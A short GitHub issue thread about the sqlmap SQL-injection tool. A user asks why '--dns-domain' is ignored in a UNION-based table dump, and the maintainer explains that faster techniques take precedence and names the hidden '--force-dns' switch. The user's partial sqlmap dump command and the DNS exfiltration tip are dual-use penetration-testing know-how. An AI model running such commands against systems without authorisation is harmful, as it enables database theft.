### ISSUE TITLE
--dns-domain ignored ...omg...

### ISSUE THREAD

**Issue by mrblackfree** [sqlmapproject/sqlmap#3617]
[WARNING] option '--dns-domain' will be ignored as faster techniques are usable (U)

Union Query cant do this?

My command was 

--dbms=mysql -D database -T table -C a1,a2 --start=450001 --stop=500000 --technique=U --dns-domain domain.com --dump --threads 10

**Comment by stamparm** [comment]
OMG. You have everything written at the console output. Faster technique is preferred over DNS exfiltration. The irony is that you've also forced UNION SQLi with `--technique=U`. If you really want to force DNS exfiltration over other (faster) cases (if any) you can try to rerun everything with hidden switch `--force-dns`
